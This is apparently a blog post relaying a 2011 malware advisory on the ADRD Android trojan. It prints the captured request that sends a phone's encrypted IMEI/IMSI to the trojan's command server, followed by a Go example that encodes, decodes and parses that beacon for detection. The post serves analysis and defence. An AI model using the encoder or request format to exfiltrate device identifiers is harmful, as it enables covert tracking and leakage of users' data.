Mobile security vendor AegisLab reports that it has found a new Android trojan, "ADRD".
Like Geinimi, it appears to be a legitimate package with malicious code inserted and then repackaged, and it has been confirmed to send user information to a specific server.
It seems to have been named ADRD after the server it reports to, adrd.taxuan.net. Heh.
- Original: http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1
Security Alert 2011-02-14: New Android Trojan "ADRD" Was Found in the Wild by AegisLab
AegisLab is devoted to protecting the security of mobile users; we have collected and analyzed Android packages for two years. Today we found a new Android trojan, which we call "ADRD", that had not been reported by any security vendor before.
In our analysis, the malware writer repackaged (infected) legitimate apps, especially wallpapers, which do not usually appear in the apps panel, so users may rarely notice it. This trojan compromises personal data such as the IMEI/IMSI of the device and sends it back to the remote side, then reacts to the commands received from there. The infected applications request extensive permissions such as RECEIVE_BOOT_COMPLETED and ACCESS_NETWORK_STATE so that they can run in the background once the corresponding event occurs. It also schedules an alarm to wake itself up regularly. However, it is somewhat lower-profile than the 'GEINIMI' trojan found last year: fewer messages/commands are sent and less bandwidth is consumed by this trojan. Users may not even notice it after weeks, but still suffer data leakage and bandwidth consumption.
How it works:
It registers several receivers to intercept events such as boot completed, network connectivity change, etc., and then starts a service in the background once the event occurs. The service first connects back to the server via HTTP with a DES-encrypted, hex-encoded string like:
POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
Host: adrd.taxuan.net
After decoding, we have:
354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4
It sends back the IMEI/IMSI of the phone together with some version numbers of the trojan, for the server to decide the next step. Later the server responds with a list of URLs:
After a few HTTP requests back and forth, it gets a URL to connect to in the background (in the case analyzed): http://wap.baidu.com/s?word=%e7%83%a8%e4%b9%8b%e5%9b%bd%e5%ba%a6&vit=uni&from=961a_w1
The malware writer may profit from the links users are made to visit, while users suffer data disclosure as well as bandwidth consumption (a higher network bill).
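The check-in described above, reconstructed as an added example (this is not AegisLab's code nor the trojan's): the IMEI, IMSI, two version numbers and a channel tag are joined with "&", DES-encrypted, hex-encoded and placed in the im= query parameter of a POST to adrd.taxuan.net. The page does not publish the DES key or the cipher mode, so the 8-byte key and ECB mode below are assumptions, and the IMEI/IMSI values are constructed. The example also parses a captured request line plus Host header, which is the shape a detection rule would match on. With a 48-character plaintext, PKCS#5 padding gives 56 bytes, i.e. a 112-character hex string, the same length as the sample on the page.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Hypothetical 8-byte DES key: the real key is not published on the page.
var beaconKey = []byte("example!")

// Beacon holds the fields in the order the decoded sample shows them:
// IMEI&IMSI&ver&ver&channel.
type Beacon struct {
	IMEI, IMSI string
	Versions   []string
	Channel    string
}

func pkcs5Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("bad padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("inconsistent padding")
		}
	}
	return b[:len(b)-n], nil
}

// desECB runs DES block by block. ECB mode is an assumption; the page does
// not state which mode the trojan uses.
func desECB(key, in []byte, encrypt bool) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(in)%block.BlockSize() != 0 {
		return nil, errors.New("input not block aligned")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += block.BlockSize() {
		if encrypt {
			block.Encrypt(out[i:], in[i:])
		} else {
			block.Decrypt(out[i:], in[i:])
		}
	}
	return out, nil
}

// EncodeBeacon builds the hex string that goes into the ?im= parameter.
func EncodeBeacon(b Beacon, key []byte) (string, error) {
	fields := append([]string{b.IMEI, b.IMSI}, b.Versions...)
	fields = append(fields, b.Channel)
	ct, err := desECB(key, pkcs5Pad([]byte(strings.Join(fields, "&")), des.BlockSize), true)
	if err != nil {
		return "", err
	}
	return hex.EncodeToString(ct), nil
}

// DecodeBeacon reverses EncodeBeacon and splits the plaintext into fields.
func DecodeBeacon(hexStr string, key []byte) (Beacon, error) {
	ct, err := hex.DecodeString(hexStr)
	if err != nil {
		return Beacon{}, err
	}
	pt, err := desECB(key, ct, false)
	if err != nil {
		return Beacon{}, err
	}
	plain, err := pkcs5Unpad(pt, des.BlockSize)
	if err != nil {
		return Beacon{}, err
	}
	f := strings.Split(string(plain), "&")
	if len(f) < 3 {
		return Beacon{}, errors.New("too few fields in beacon")
	}
	return Beacon{IMEI: f[0], IMSI: f[1], Versions: f[2 : len(f)-1], Channel: f[len(f)-1]}, nil
}

// ExtractIM pulls the im= value out of a captured HTTP request and returns it
// with the Host header, so a detector can match the host against adrd.taxuan.net.
func ExtractIM(request string) (im, host string, err error) {
	lines := strings.Split(request, "\n")
	parts := strings.Fields(lines[0])
	if len(parts) < 2 {
		return "", "", errors.New("malformed request line")
	}
	u, err := url.Parse(parts[1])
	if err != nil {
		return "", "", err
	}
	im = u.Query().Get("im")
	for _, l := range lines[1:] {
		kv := strings.SplitN(l, ":", 2)
		if len(kv) == 2 && strings.EqualFold(strings.TrimSpace(kv[0]), "host") {
			host = strings.TrimSpace(kv[1])
		}
	}
	if im == "" || host == "" {
		return "", "", errors.New("no im parameter or Host header")
	}
	return im, host, nil
}

func main() {
	// Constructed sample values; the page masks the real IMEI/IMSI with x's.
	b := Beacon{IMEI: "354059000000000", IMSI: "310260000000000", Versions: []string{"1", "6"}, Channel: "adrd.zt.cw.4"}
	im, _ := EncodeBeacon(b, beaconKey)
	req := fmt.Sprintf("POST /index.aspx?im=%s HTTP/1.1\nHost: adrd.taxuan.net\n", im)
	gotIM, host, _ := ExtractIM(req)
	d, _ := DecodeBeacon(gotIM, beaconKey)
	fmt.Println(len(im), host, d)
}
```

DecodeBeacon rejects a truncated or misaligned ciphertext before touching the padding, which is the failure you hit first when a proxy log has clipped the query string; with the real key in hand the same decoder would recover the IMEI/IMSI leaked by an infected device from a packet capture.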